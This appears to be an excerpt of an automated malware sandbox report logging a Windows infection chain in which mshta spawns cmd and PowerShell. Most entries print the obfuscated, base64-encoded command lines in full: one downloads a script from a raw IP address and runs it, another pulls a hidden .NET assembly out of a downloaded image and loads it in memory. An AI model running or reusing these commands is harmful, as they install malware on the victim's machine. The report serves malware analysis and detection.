                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.pdb source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
